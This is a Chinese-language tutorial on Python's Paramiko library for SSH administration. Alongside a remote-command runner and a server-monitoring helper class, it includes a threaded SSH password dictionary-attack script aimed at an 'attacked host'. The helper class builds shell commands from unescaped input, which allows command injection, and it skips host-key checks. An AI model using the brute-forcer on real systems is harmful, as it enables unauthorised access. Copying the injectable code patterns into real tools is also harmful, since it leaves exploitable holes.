Python使用Paramiko实现SSH管理

paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信。目前该模块支持所有平台架构且自身遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接,你可以在Python中实现SSH客户端和服务器,并进行安全的文件传输和远程命令执行。

主要特点:

  1. SSH 支持: paramiko 提供了对 SSHv2 协议的完整支持,可以用于安全地连接和通信到远程服务器。
  2. SSH 客户端和服务端实现: paramiko 不仅可以用作 SSH 客户端,还可以在 Python 中实现 SSH 服务器。这意味着你可以使用 paramiko 来创建自己的 SSH 服务器,或者编写客户端与远程服务器进行通信。
  3. SFTP 文件传输: paramiko 包含了对 SFTP(SSH 文件传输协议)的实现,可以在安全通道上传输文件,支持上传和下载文件。
  4. 支持密钥认证: 除了用户名和密码认证外,paramiko 还支持使用密钥进行认证,包括支持 RSA 和 DSA 密钥。
  5. 多种认证方法: 支持多种认证方法,包括密码认证、密钥认证、GSS-API 认证等。
  6. 高级特性: 提供了一些高级特性,如端口转发(port forwarding)、代理支持等,使其适用于更复杂的网络场景。
  7. 跨平台: paramiko 可以在多个平台上运行,包括 Linux、Windows 和 macOS。
  8. 易用性: 提供了简单而易用的 API,使得在 Python 中进行 SSH 连接、文件传输等操作变得容易。
  9. 活跃的社区支持: paramiko 是一个开源项目,拥有活跃的社区支持。这意味着你可以在社区中找到文档、示例代码和得到技术支持。

实现简单SSH连接

import paramiko,threading
import argparse

class MyThread(threading.Thread):
def __init__(self,address,username,password,port,command):
super(MyThread, self).__init__()
self.address = address
self.username = username
self.password = password
self.port = port
self.command = command
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
stdin, stdout, stderr = ssh.exec_command(self.command)
result = stdout.read()
if not result:
self.result = stderr.read()
ssh.close()
self.result = result.decode()
except Exception:
self.result = "0"
def get_result(self):
try:
return self.result
except Exception:
return "0"

if __name__ == "__main__":
# 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig
parser = argparse.ArgumentParser()
parser.add_argument("-a",dest="addr",help="指定一个IP地址")
parser.add_argument("-u",dest="user",help="指定目标主机用户名")
parser.add_argument("-p",dest="passwd",help="指定目标主机密码")
parser.add_argument("-c",dest="command",help="指定需要执行的命令")
args = parser.parse_args()
if args.addr and args.user and args.passwd and args.command:
obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command))
obj.start()
obj.join()
ret = obj.get_result()
if ret != "0":
print(ret)
else:
parser.print_help()

实现SSH批量尝试

import pexpect
import os,sys,time
import threading
import argparse

def SSHConnect(Host,User,Password,Port,Command):
try:
child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1)
ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
if ret == 0: # 连接超时
child.close()
return 0
elif ret == 1: # SSH提示你是否确认连接
child.sendline ('yes') # 我们输入yes
child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
ret = child.expect([pexpect.TIMEOUT, 'password: '])
if ret == 0: # 连接超时
child.close()
return 0
ret = child.sendline(Password)
if ret == 5:
#child.expect(pexpect.EOF)
#return child.before
return 1
child.close()
return 0
except Exception:
child.close()
return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
semaphore.acquire() # 加锁
global number,PassCount
RetCode = SSHConnect(Host,User,Password,Port,"pwd")
if RetCode == 1:
print("[*] 索引: {}/{} --> 密码: {}".format(str(number),str(PassCount),Password))
else:
print("[-] 索引: {}/{} --> 尝试: {}".format(str(number),str(PassCount),Password))

number = number + 1
semaphore.release() # 释放锁

if __name__ == "__main__":
# 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log
parser = argparse.ArgumentParser()
parser.add_argument("-H","--host",dest="host",help="输入一个被攻击主机IP地址")
parser.add_argument("-u","--user",dest="user",help="输入主机的用户账号,root")
parser.add_argument("-p","--port",dest="port",help="输入SSH的端口号,22")
parser.add_argument("-f","--file",dest="file",help="设置密码字典 wordlist.log")
args = parser.parse_args()
if args.host and args.user and args.port and args.file:
number = 0
semaphore = threading.Semaphore(4)
fp = open(args.file,"r")
PassList = fp.readlines()
PassCount = len(PassList)
for item in PassList:
t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("\n","")),args.port,semaphore))
t.start()
else:
parser.print_help()

封装MySSH通用类

import paramiko, math

class MySSH:
def __init__(self, address, username, password, default_port):
self.address = address
self.default_port = default_port
self.username = username
self.password = password

# 初始化SSH接口
def Init(self):
try:
self.ssh_obj = paramiko.SSHClient()
self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3,
allow_agent=False, look_for_keys=False)
self.sftp_obj = self.ssh_obj.open_sftp()
return True
except Exception:
return False
return False

# 执行命令并返回执行结果
def BatchCMD(self, command):
try:
stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
result = stdout.read()
if len(result) != 0:
result = str(result).replace("\\n", "\n")
result = result.replace("b'", "").replace("'", "")
return result
else:
return None
except Exception:
return None

# 执行非交互命令 只返回执行状态 ,或真或假
def BatchCMD_NotRef(self, command):
try:
stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
result = stdout.read()
if len(result) != 0:
return True
else:
return None
except Exception:
return False

# 将远程文件下载到本地
def GetRemoteFile(self, remote_path, local_path):
try:
self.sftp_obj.get(remote_path, local_path)
return True
except Exception:
return False

# 将本地文件上传到远程
def PutLocalFile(self, localpath, remotepath):
try:
self.sftp_obj.put(localpath, remotepath)
return True
except Exception:
return False

# 获取文件大小
def GetFileSize(self, file_path):
ref = self.BatchCMD("du -s " + file_path + " | awk '{print $1}'")
return ref.replace("\n", "")

# 判断文件是否存在
def IsFile(self, file_path):
return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path))

# 获取系统型号
def GetSystemVersion(self):
return self.BatchCMD("uname")

# 关闭SSH接口
def CloseSSH(self):
try:
self.sftp_obj.close()
self.ssh_obj.close()
except Exception:
pass

# 测试主机连通率
def GetPing(self):
try:
if self.GetSystemVersion() != None:
print("{} 已连通.".format(self.address))
return True
else:
return False
except Exception:
return False

# 获取文件列表,并得到大小
def GetFileList(self, path):
try:
ref_list = []
self.sftp_obj.chdir(path)
file_list = self.sftp_obj.listdir("./")
for sub_path in file_list:
dict = {}
file_size = self.GetFileSize(path + sub_path)
dict[path + sub_path] = file_size
ref_list.append(dict)
return ref_list
except Exception:
return False

# 将远程文件全部打包后拉取到本地
def GetTarPackageAll(self, path):
try:
file_list = self.sftp_obj.listdir(path)
self.sftp_obj.chdir(path)
for packageName in file_list:
self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName))
self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName))
self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName))
return True
except Exception:
return True

# 获取磁盘空间并返回字典
def GetAllDiskSpace(self):
ref_dict = {}
cmd_dict = {"Linux\n": "df | grep -v 'Filesystem' | awk '{print $5 \":\" $6}'",
"AIX\n": "df | grep -v 'Filesystem' | awk '{print $4 \":\" $7}'"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
# 根据不同版本选择不同的命令
os_ref = self.BatchCMD(run_cmd)
ref_list = os_ref.split("\n")
# 循环将其转换为字典
for each in ref_list:
# 判断最后是否为空,过滤最后一项
if each != "":
ref_dict[str(each.split(":")[1])] = str(each.split(":")[0])
return ref_dict
except Exception:
return False

# 拉取内存数据到本地。
def GetAllMemSpace(self):
cmd_dict = {"Linux\n": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 \":\" $2}'",
"AIX\n": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 \":\" $4}'"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
mem_total = math.ceil(int(os_ref.split(":")[0].replace("\n", "")) / 1024)
mem_free = math.ceil(int(os_ref.split(":")[1].replace("\n", "")) / 1024)
percentage = 100 - int(mem_free / int(mem_total / 100))
print("利用百分比: {} \t 总内存: {} \t 剩余内存: {}".format(percentage,mem_total,mem_free))
return str(percentage) + " %"
except Exception:
return False

# 获取CPU利用率数据
def GetCPUPercentage(self):
ref_dict = {}
cmd_dict = {"Linux\n": "vmstat | tail -n 1 | awk '{print $13 \":\" $14 \":\" $15}'",
"AIX\n": "vmstat | tail -n 1 | awk '{print $14 \":\" $15 \":\" $16}'"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ref_list = os_ref.split("\n")
for each in ref_list:
if each != "":
each = each.split(":")
ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]}
print("CPU利用率数据: {}".format(ref_dict))
return ref_dict
except Exception:
return False

# 获取到系统负载利用率 也就是一分钟负载五分钟负载十五分钟负载
def GetLoadAVG(self):
ref_dict = {}
cmd_dict = {"Linux\n": "cat /proc/loadavg | awk '{print $1 \":\" $2 \":\" $3}'",
"AIX\n": "uptime | awk '{print $10 \":\" $11 \":\" $12}'"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ref_list = os_ref.split("\n")
for each in ref_list:
if each != "":
each = each.replace(",","").split(":")
ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]}
print("负载利用率: {}".format(ref_dict))
return ref_dict
return False
except Exception:
return False

# 获取系统进程信息,并返回字典格式
def GetAllProcessSpace(self):
ref_dict = {}
cmd_dict = {"Linux\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $11}' | uniq",
"AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ref_list = os_ref.split("\n")
for each in ref_list:
if each != "":
ref_dict[str(each.split(":")[0])] = str(each.split(":")[1])
return ref_dict
except Exception:
return False

# 检测指定进程是否存活
def CheckProcessStatus(self,processname):
cmd_dict = {"Linux\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"),
"AIX\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}")
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
if ret_flag != "0":
return True
return False
except Exception:
return "None"

# 判断指定进程名是否存在,如果存在返回进程 {PID:0,CPU:0,MEM:0}
def CheckProcessName(self,ProcName):
cmd_dict = {"Linux\n": "ps aux | grep '" + ProcName + "' | grep -v 'grep' | awk {'print $2 \":\" $3 \":\" $4'} | head -1",
"AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ref_list = os_ref.replace("\n","").split(":")
ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]}
return ref_dict
except Exception:
return False
return False

# 检测指定端口是否存活
def CheckPortStatus(self,port):
cmd_dict = {"Linux\n": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}")
, "AIX\n": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}")
}
try:
os_version = self.GetSystemVersion()
for version, run_cmd in cmd_dict.items():
if (version == os_version):
os_ref = self.BatchCMD(run_cmd)
ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED":
return True
return False
except Exception:
return False

# 修改当前用户密码
def SetPasswd(self,username,password):
try:
os_id = self.BatchCMD("id | awk {'print $1'}")
print(os_id)
if(os_id == "uid=0(root)\n"):
self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username))
return True
except Exception:
return False

if __name__ == "__main__":
ssh = MySSH("132.35.69.71","root","123456789",22)
if ssh.Init() == True:
ref = ssh.GetAllDiskSpace()
print(ref)